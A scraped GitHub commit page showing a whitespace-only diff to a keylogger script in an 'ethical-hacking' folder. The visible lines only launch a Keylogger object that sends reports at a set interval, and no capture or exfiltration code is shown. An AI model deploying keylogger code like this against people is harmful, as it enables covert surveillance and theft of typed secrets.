We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 85a4b8e commit a978aaeCopy full SHA for a978aae
ethical-hacking/keylogger/keylogger.py
@@ -78,7 +78,6 @@ def start(self):
78
self.semaphore.acquire()
79
80
81
-
82
if __name__ == "__main__":
83
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
84
keylogger.start()
0 commit comments